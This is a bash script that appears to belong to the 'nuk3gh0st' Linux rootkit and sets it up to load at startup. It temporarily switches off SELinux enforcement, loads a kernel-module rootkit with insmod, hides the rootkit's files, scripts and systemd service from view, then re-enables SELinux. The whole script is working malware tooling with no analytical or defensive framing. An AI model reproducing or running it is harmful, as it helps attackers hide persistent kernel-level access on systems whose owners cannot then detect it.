#!/bin/bash

green='\e[0;32m'
red='\e[0;31m'
purple='\e[0;35m'
yellow='\e[0;33m'
cyan='\e[0;36m'
endColor='\e[0m'
item=${green}[*]${endColor}

function print_banner {
	echo ""
	echo -e "${green}#################################${endColor}"
	echo -e "${green}# Enabling nuk3gh0st at startup #${endColor}"
	echo -e "${green}#################################${endColor}"
	echo ""
}

function enable_selinux {
	echo -e "${item} Reenabling SELINUX"
	echo -e "   ${purple} cmd: setenforce 1${endColor}"
	setenforce 1
        echo ""
}

function disable_selinux {
	echo -e "${item} Disabling SELINUX temporarily"
	echo -e "   ${purple} cmd: setenforce 0${endColor}"
	setenforce 0
	echo ""
}

function load_rootkit {
	echo -e "${item} Loading nuk3gh0st LKM rootkit"
	echo -e "   ${purple} cmd: insmod /usr/lib/rootkit.ko${endColor}"
	insmod /usr/lib/rootkit.ko
	echo ""
}

function hide_rootkit_files {
	echo -e "${item} Hidding nuk3gh0st files"
        echo -e "   ${purple} cmd: nuk3gh0st --hide-file=rootkit.ko${endColor}"
        nuk3gh0st --hide-file=rootkit.ko
        echo -e "   ${purple} cmd: nuk3gh0st --hide-file=nuk3gh0st${endColor}"
        nuk3gh0st --hide-file=nuk3gh0st
        echo -e "   ${purple} cmd: nuk3gh0st --hide-file=load-nuk3gh0st${endColor}"
        nuk3gh0st --hide-file=load-nuk3gh0st
        echo -e "   ${purple} cmd: nuk3gh0st --hide-file=unload-nuk3gh0st${endColor}"
        nuk3gh0st --hide-file=unload-nuk3gh0st
        echo -e "   ${purple} cmd: nuk3gh0st --hide-file=startup-nuk3gh0st${endColor}"
        nuk3gh0st --hide-file=startup-nuk3gh0st
        echo -e "   ${purple} cmd: nuk3gh0st --hide-file=rmstartup-nuk3gh0st${endColor}"
        nuk3gh0st --hide-file=rmstartup-nuk3gh0st
        echo -e "   ${purple} cmd: nuk3gh0st --hide-file=nuk3gh0st.startup${endColor}"
        nuk3gh0st --hide-file=nuk3gh0st.startup
        echo -e "   ${purple} cmd: nuk3gh0st --hide-file=nuk3gh0st.service${endColor}"
        nuk3gh0st --hide-file=nuk3gh0st.service
        echo ""

        echo -e "${yellow}WARNING: you won't be able to see the installation folder"
        echo -e "until you unload the rootkit, but it will still exist "
        echo -e "and you can access to it if you remember the path${endColor}"
        echo ""
}

echo -e "${item} Checking if SELINUX is enabled..."
if [ -f /usr/sbin/setenforce ]; then
	echo -e "${item} SELINUX is enabled"
	disable_selinux       
        load_rootkit
        hide_rootkit_files
      	enable_selinux  
else 
        echo -e "${item} SELINUX is disabled"
       	load_rootkit
	hide_rootkit_files
fi
